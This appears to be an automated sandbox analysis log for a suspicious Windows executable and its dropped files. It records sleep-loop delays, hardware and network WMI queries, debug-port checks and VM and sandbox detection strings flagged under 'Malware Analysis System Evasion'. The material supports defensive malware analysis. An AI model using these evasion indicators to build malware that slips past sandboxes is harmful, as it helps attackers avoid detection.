                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: tmp2083.tmp.exe PID: 7652, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 1970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 3410000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 5410000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeMemory allocated: 4700000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 17C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeMemory allocated: 5230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 3000000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999890Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999779Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999561Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999452Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999122Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999009Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998906Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998793Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998687Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998469Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998125Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998006Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997889Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997777Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997665Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997499Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997379Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997219Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeWindow / User API: threadDelayed 1625Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeWindow / User API: threadDelayed 3487Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWindow / User API: threadDelayed 2404Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWindow / User API: threadDelayed 1985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -3000000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7552Thread sleep count: 1625 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7552Thread sleep count: 3487 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999779s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999561s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999452s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999122s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2999009s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998793s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998469s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2998006s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997889s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997777s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997665s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997499s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997379s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7504Thread sleep time: -2997219s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7532Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe TID: 7412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7608Thread sleep count: 2404 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7608Thread sleep count: 1985 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99780s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99447s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99340s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99183s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -99070s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98905s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98784s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98625s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98514s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98381s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98246s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98139s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -98026s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97920s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97689s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97548s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97308s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97202s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -97075s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exe TID: 7604Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#0503711.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 3000000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999890Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999779Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999561Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999452Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999122Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2999009Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998906Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998793Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998687Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998469Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998125Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2998006Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997889Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997777Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997665Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997499Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997379Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 2997219Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99780Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99671Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99562Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99447Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99340Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99183Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 99070Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98905Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98784Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98625Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98514Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98381Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98246Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98139Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 98026Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97920Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97812Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97689Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97548Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97421Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97308Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97202Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 97075Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: CompanyNameVMware, Inc.D
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: ProductNameVMware Workstation>
                      Source: docdd.exe, 00000001.00000002.1727611492.0000000000C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware, Inc.
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: CommentsVMware Player:
                      Source: Ref#0503711.exe, 00000002.00000002.2914646744.00000000011EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                      Source: tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: docdd.exe, 00000001.00000002.1727611492.0000000000C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: docdd.exe, 00000001.00000002.1752498507.0000000005C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NameVMware Wor
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware, Inc.1
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware, Inc.0
                      Source: tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware Workstation%
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: FileDescriptionVMware Player:
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: noreply@vmware.com
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware Player
                      Source: tmp2083.tmp.exe.1.drBinary or memory string: VMware Workstation
                      Source: docdd.exe, 00000001.00000002.1727611492.0000000000C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: docdd.exe, 00000001.00000002.1752498507.0000000005C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sVMware Player:
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess token adjusted: DebugJump to behavior
